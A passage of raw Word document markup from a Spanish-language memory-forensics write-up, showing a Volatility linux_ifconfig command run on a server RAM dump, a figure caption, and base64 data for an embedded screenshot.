      <w:r w:rsidRPr="005A186E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>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ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005A186E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>.mem' linux_ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, viene a recordar el comando </w:t>
      </w:r>
      <w:r w:rsidR="00FF4835">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251784192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6547790F" wp14:editId="0AA1C54B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1178891</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5395097" cy="826135"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="186227012" name="Grupo 38"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5395097" cy="826135"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5395097" cy="826135"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="64904862" name="Imagen 66"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="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55340" cy="826135"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="685554316" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3465967" y="63796"/>
                            <a:ext cx="1929130" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="3605147D" w14:textId="69B3DFDE" w:rsidR="00915A6C" w:rsidRPr="003E7AEF" w:rsidRDefault="00915A6C" w:rsidP="00915A6C">
                              <w:pPr>
                                <w:pStyle w:val="Descripcin"/>
                                <w:rPr>
                                  <w:rFonts w:cs="Arial"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:t xml:space="preserve">Ilustración </w:t>
                              </w:r>
                              <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                                <w:r w:rsidR="00117A4E">
                                  <w:rPr>
                                    <w:noProof/>
                                  </w:rPr>
                                  <w:t>42</w:t>
                                </w:r>
                              </w:fldSimple>
                              <w:r>
                                <w:t xml:space="preserve">: </w:t>
                              </w:r>
                              <w:bookmarkStart w:id="105" w:name="_Toc155782609"/>
                              <w:r w:rsidRPr="00ED0A85">
                                <w:t>Comando linux_ifconfig.</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47790F" id="Grupo 38" o:spid="_x0000_s1162" style="position:absolute;left:0;text-align:left;margin-left:373.6pt;margin-top:92.85pt;width:424.8pt;height:65.05pt;z-index:251784192;mso-position-horizontal:right;mso-position-horizontal-relative:margin" coordsize="5395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